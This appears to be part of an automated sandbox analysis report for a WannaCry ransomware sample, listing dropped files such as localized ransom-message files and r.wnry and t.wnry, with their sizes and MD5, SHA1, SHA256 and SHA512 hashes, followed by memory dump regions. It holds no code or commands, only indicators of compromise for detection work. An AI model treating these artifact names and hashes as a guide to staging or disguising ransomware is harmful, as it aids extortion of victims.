
SHA512
966b5ed68be6b5ccd46e0de1fa868cfe5432d9bf82e1e2f6eb99b2aef3c92f88d96f4f4eec5e16381b9c6db80a68071e7124ca1474d664bdd77e1817ec600cb4

Download Submit
C:\Users\Admin\Downloads\WannaCry\msg\m_finnish.wnry

Filesize
37KB

MD5
35c2f97eea8819b1caebd23fee732d8f

SHA1
e354d1cc43d6a39d9732adea5d3b0f57284255d2

SHA256
1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

SHA512
908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

Download Submit
C:\Users\Admin\Downloads\WannaCry\msg\m_french.wnry

Filesize
37KB

MD5
4e57113a6bf6b88fdd32782a4a381274

SHA1
0fccbc91f0f94453d91670c6794f71348711061d

SHA256
9bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc

SHA512
4f1918a12269c654d44e9d394bc209ef0bc32242be8833a2fba437b879125177e149f56f2fb0c302330dec328139b34982c04b3fefb045612b6cc9f83ec85aa9

Download Submit
C:\Users\Admin\Downloads\WannaCry\msg\m_german.wnry

Filesize
36KB

MD5
3d59bbb5553fe03a89f817819540f469

SHA1
26781d4b06ff704800b463d0f1fca3afd923a9fe

SHA256
2adc900fafa9938d85ce53cb793271f37af40cf499bcc454f44975db533f0b61

SHA512
95719ae80589f71209bb3cb953276538040e7111b994d757b0a24283aefe27aadbbe9eef3f1f823ce4cabc1090946d4a2a558607ac6cac6faca5971529b34dac

Download Submit
C:\Users\Admin\Downloads\WannaCry\msg\m_greek.wnry

Filesize
47KB

MD5
fb4e8718fea95bb7479727fde80cb424

SHA1
1088c7653cba385fe994e9ae34a6595898f20aeb

SHA256
e13cc9b13aa5074dc45d50379eceb17ee39a0c2531ab617d93800fe236758ca9

SHA512
24db377af1569e4e2b2ebccec42564cea95a30f1ff43bcaf25a692f99567e027bcef4aacef008ec5f64ea2eef0c04be88d2b30bcadabb3919b5f45a6633940cb

Download Submit
C:\Users\Admin\Downloads\WannaCry\msg\m_indonesian.wnry

Filesize
36KB

MD5
3788f91c694dfc48e12417ce93356b0f

SHA1
eb3b87f7f654b604daf3484da9e02ca6c4ea98b7

SHA256
23e5e738aad10fb8ef89aa0285269aff728070080158fd3e7792fe9ed47c51f4

SHA512
b7dd9e6dc7c2d023ff958caf132f0544c76fae3b2d8e49753257676cc541735807b4befdf483bcae94c2dcde3c878c783b4a89dca0fecbc78f5bbf7c356f35cd

Download Submit
C:\Users\Admin\Downloads\WannaCry\msg\m_italian.wnry

Filesize
36KB

MD5
30a200f78498990095b36f574b6e8690

SHA1
c4b1b3c087bd12b063e98bca464cd05f3f7b7882

SHA256
49f2c739e7d9745c0834dc817a71bf6676ccc24a4c28dcddf8844093aab3df07

SHA512
c0da2aae82c397f6943a0a7b838f60eeef8f57192c5f498f2ecf05db824cfeb6d6ca830bf3715da7ee400aa8362bd64dc835298f3f0085ae7a744e6e6c690511

Download Submit
C:\Users\Admin\Downloads\WannaCry\msg\m_japanese.wnry

Filesize
79KB

MD5
b77e1221f7ecd0b5d696cb66cda1609e

SHA1
51eb7a254a33d05edf188ded653005dc82de8a46

SHA256
7e491e7b48d6e34f916624c1cda9f024e86fcbec56acda35e27fa99d530d017e

SHA512
f435fd67954787e6b87460db026759410fbd25b2f6ea758118749c113a50192446861a114358443a129be817020b50f21d27b1ebd3d22c7be62082e8b45223fc

Download Submit
C:\Users\Admin\Downloads\WannaCry\msg\m_korean.wnry

Filesize
89KB

MD5
6735cb43fe44832b061eeb3f5956b099

SHA1
d636daf64d524f81367ea92fdafa3726c909bee1

SHA256
552aa0f82f37c9601114974228d4fc54f7434fe3ae7a276ef1ae98a0f608f1d0

SHA512
60272801909dbba21578b22c49f6b0ba8cd0070f116476ff35b3ac8347b987790e4cc0334724244c4b13415a246e77a577230029e4561ae6f04a598c3f536c7e

Download Submit
C:\Users\Admin\Downloads\WannaCry\msg\m_latvian.wnry

Filesize
40KB

MD5
c33afb4ecc04ee1bcc6975bea49abe40

SHA1
fbea4f170507cde02b839527ef50b7ec74b4821f

SHA256
a0356696877f2d94d645ae2df6ce6b370bd5c0d6db3d36def44e714525de0536

SHA512
0d435f0836f61a5ff55b78c02fa47b191e5807a79d8a6e991f3115743df2141b3db42ba8bdad9ad259e12f5800828e9e72d7c94a6a5259312a447d669b03ec44

Download Submit
C:\Users\Admin\Downloads\WannaCry\msg\m_norwegian.wnry

Filesize
36KB

MD5
ff70cc7c00951084175d12128ce02399

SHA1
75ad3b1ad4fb14813882d88e952208c648f1fd18

SHA256
cb5da96b3dfcf4394713623dbf3831b2a0b8be63987f563e1c32edeb74cb6c3a

SHA512
f01df3256d49325e5ec49fd265aa3f176020c8ffec60eb1d828c75a3fa18ff8634e1de824d77dfdd833768acff1f547303104620c70066a2708654a07ef22e19

Download Submit
C:\Users\Admin\Downloads\WannaCry\msg\m_polish.wnry

Filesize
38KB

MD5
e79d7f2833a9c2e2553c7fe04a1b63f4

SHA1
3d9f56d2381b8fe16042aa7c4feb1b33f2baebff

SHA256
519ad66009a6c127400c6c09e079903223bd82ecc18ad71b8e5cd79f5f9c053e

SHA512
e0159c753491cac7606a7250f332e87bc6b14876bc7a1cf5625fa56ab4f09c485f7b231dd52e4ff0f5f3c29862afb1124c0efd0741613eb97a83cbe2668af5de

Download Submit
C:\Users\Admin\Downloads\WannaCry\msg\m_portuguese.wnry

Filesize
37KB

MD5
fa948f7d8dfb21ceddd6794f2d56b44f

SHA1
ca915fbe020caa88dd776d89632d7866f660fc7a

SHA256
bd9f4b3aedf4f81f37ec0a028aabcb0e9a900e6b4de04e9271c8db81432e2a66

SHA512
0d211bfb0ae953081dca00cd07f8c908c174fd6c47a8001fadc614203f0e55d9fbb7fa9b87c735d57101341ab36af443918ee00737ed4c19ace0a2b85497f41a

Download Submit
C:\Users\Admin\Downloads\WannaCry\msg\m_romanian.wnry

Filesize
50KB

MD5
313e0ececd24f4fa1504118a11bc7986

SHA1
e1b9ae804c7fb1d27f39db18dc0647bb04e75e9d

SHA256
70c0f32ed379ae899e5ac975e20bbbacd295cf7cd50c36174d2602420c770ac1

SHA512
c7500363c61baf8b77fce796d750f8f5e6886ff0a10f81c3240ea3ad4e5f101b597490dea8ab6bd9193457d35d8fd579fce1b88a1c8d85ebe96c66d909630730

Download Submit
C:\Users\Admin\Downloads\WannaCry\msg\m_russian.wnry

Filesize
46KB

MD5
452615db2336d60af7e2057481e4cab5

SHA1
442e31f6556b3d7de6eb85fbac3d2957b7f5eac6

SHA256
02932052fafe97e6acaaf9f391738a3a826f5434b1a013abbfa7a6c1ade1e078

SHA512
7613dc329abe7a3f32164c9a6b660f209a84b774ab9c008bf6503c76255b30ea9a743a6dc49a8de8df0bcb9aea5a33f7408ba27848d9562583ff51991910911f

Download Submit
C:\Users\Admin\Downloads\WannaCry\msg\m_slovak.wnry

Filesize
40KB

MD5
c911aba4ab1da6c28cf86338ab2ab6cc

SHA1
fee0fd58b8efe76077620d8abc7500dbfef7c5b0

SHA256
e64178e339c8e10eac17a236a67b892d0447eb67b1dcd149763dad6fd9f72729

SHA512
3491ed285a091a123a1a6d61aafbb8d5621ccc9e045a237a2f9c2cf6049e7420eb96ef30fdcea856b50454436e2ec468770f8d585752d73fafd676c4ef5e800a

Download Submit
C:\Users\Admin\Downloads\WannaCry\msg\m_spanish.wnry

Filesize
36KB

MD5
8d61648d34cba8ae9d1e2a219019add1

SHA1
2091e42fc17a0cc2f235650f7aad87abf8ba22c2

SHA256
72f20024b2f69b45a1391f0a6474e9f6349625ce329f5444aec7401fe31f8de1

SHA512
68489c33ba89edfe2e3aebaacf8ef848d2ea88dcbef9609c258662605e02d12cfa4ffdc1d266fc5878488e296d2848b2cb0bbd45f1e86ef959bab6162d284079

Download Submit
C:\Users\Admin\Downloads\WannaCry\msg\m_swedish.wnry

Filesize
37KB

MD5
c7a19984eb9f37198652eaf2fd1ee25c

SHA1
06eafed025cf8c4d76966bf382ab0c5e1bd6a0ae

SHA256
146f61db72297c9c0facffd560487f8d6a2846ecec92ecc7db19c8d618dbc3a4

SHA512
43dd159f9c2eac147cbff1dda83f6a83dd0c59d2d7acac35ba8b407a04ec9a1110a6a8737535d060d100ede1cb75078cf742c383948c9d4037ef459d150f6020

Download Submit
C:\Users\Admin\Downloads\WannaCry\msg\m_turkish.wnry

Filesize
41KB

MD5
531ba6b1a5460fc9446946f91cc8c94b

SHA1
cc56978681bd546fd82d87926b5d9905c92a5803

SHA256
6db650836d64350bbde2ab324407b8e474fc041098c41ecac6fd77d632a36415

SHA512
ef25c3cf4343df85954114f59933c7cc8107266c8bcac3b5ea7718eb74dbee8ca8a02da39057e6ef26b64f1dfccd720dd3bf473f5ae340ba56941e87d6b796c9

Download Submit
C:\Users\Admin\Downloads\WannaCry\msg\m_vietnamese.wnry

Filesize
91KB

MD5
8419be28a0dcec3f55823620922b00fa

SHA1
2e4791f9cdfca8abf345d606f313d22b36c46b92

SHA256
1f21838b244c80f8bed6f6977aa8a557b419cf22ba35b1fd4bf0f98989c5bdf8

SHA512
8fca77e54480aea3c0c7a705263ed8fb83c58974f5f0f62f12cc97c8e0506ba2cdb59b70e59e9a6c44dd7cde6adeeec35b494d31a6a146ff5ba7006136ab9386

Download Submit
C:\Users\Admin\Downloads\WannaCry\r.wnry

Filesize
864B

MD5
3e0020fc529b1c2a061016dd2469ba96

SHA1
c3a91c22b63f6fe709e7c29cafb29a2ee83e6ade

SHA256
402751fa49e0cb68fe052cb3db87b05e71c1d950984d339940cf6b29409f2a7c

SHA512
5ca3c134201ed39d96d72911c0498bae6f98701513fd7f1dc8512819b673f0ea580510fa94ed9413ccc73da18b39903772a7cbfa3478176181cee68c896e14cf

Download Submit
C:\Users\Admin\Downloads\WannaCry\t.wnry

Filesize
64KB

MD5
5dcaac857e695a65f5c3ef1441a73a8f

SHA1
7b10aaeee05e7a1efb43d9f837e9356ad55c07dd

SHA256
97ebce49b14c46bebc9ec2448d00e1e397123b256e2be9eba5140688e7bc0ae6

SHA512
06eb5e49d19b71a99770d1b11a5bb64a54bf3352f36e39a153469e54205075c203b08128dc2317259db206ab5323bdd93aaa252a066f57fb5c52ff28deedb5e2

Download Submit
memory/572-620-0x0000000010000000-0x0000000010010000-memory.dmp

Filesize
64KB

Download
memory/1256-2553-0x00007FF7AB740000-0x00007FF7AB74C000-memory.dmp

Filesize
48KB

Download
memory/1256-2557-0x00007FF7AB740000-0x00007FF7AB74C000-memory.dmp

Filesize
48KB

Download
memory/2116-237-0x00007FF606C30000-0x00007FF606C3C000-memory.dmp

Filesize
48KB

Download
memory/2116-250-0x00007FF606C30000-0x00007FF606C3C000-memory.dmp

Filesize
48KB

Download
memory/2760-2859-0x000000001CE80000-0x000000001D042000-memory.dmp

Filesize
1.8MB

Download
memory/2760-2852-0x00000000003D0000-0x00000000003FA000-memory.dmp

Filesize
168KB

Download
memory/2760-2860-0x000000001D580000-0x000000001DAA8000-memory.dmp

Filesize
5.2MB

Download
memory/3240-3182-0x000001912BC50000-0x000001912CAA8000-memory.dmp

Filesize
14.3MB

Download
memory/4840-2020-0x0000000000280000-0x000000000057E000-memory.dmp

Filesize
3.0MB

Download
memory/4840-1827-0x00000000740A0000-0x0000000074122000-memory.dmp

Filesize
520KB

Download
memory/4840-1984-0x0000000073E80000-0x000000007409C000-memory.dmp

Filesize
2.1MB

Download
memory/4840-1978-0x0000000000280000-0x000000000057E000-memory.dmp

Filesize
3.0MB

Download
memory/4840-1985-0x0000000000280000-0x000000000057E000-memory.dmp

Filesize
3.0MB

Download
memory/4840-1967-0x0000000000280000-0x000000000057E000-memory.dmp

Filesize
3.0MB

Download
memory/4840-1991-0x0000000073E80000-0x000000007409C000-memory.dmp

Filesize
2.1MB

Download
memory/4840-1874-0x0000000073E80000-0x000000007409C000-memory.dmp

Filesize
2.1MB

Download
memory/4840-1960-0x0000000000280000-0x000000000057E000-memory.dmp

Filesize
3.0MB

Download
memory/4840-1873-0x00000000740A0000-0x0000000074122000-memory.dmp

Filesize
520KB

Download
memory/4840-1868-0x0000000000280000-0x000000000057E000-memory.dmp

Filesize
3.0MB

Download
memory/4840-1829-0x0000000000280000-0x000000000057E000-memory.dmp

Filesize
3.0MB

Download
memory/4840-1826-0x0000000073E80000-0x000000007409C000-memory.dmp

Filesize
2.1MB

Download
memory/4840-1869-0x00000000741E0000-0x0000000074262000-memory.dmp

Filesize
520KB

Download
memory/4840-1870-0x0000000074BB0000-0x0000000074BCC000-memory.dmp

Filesize
112KB

Download
memory/4840-1871-0x00000000741B0000-0x00000000741D2000-memory.dmp

Filesize
136KB

Download
memory/4840-1872-0x0000000074130000-0x00000000741A7000-memory.dmp

Filesize
476KB

Download
memory/4840-1828-0x00000000741B0000-0x00000000741D2000-memory.dmp

Filesize
136KB

Download
memory/4840-1825-0x00000000741E0000-0x0000000074262000-memory.dmp

Filesize
520KB

Download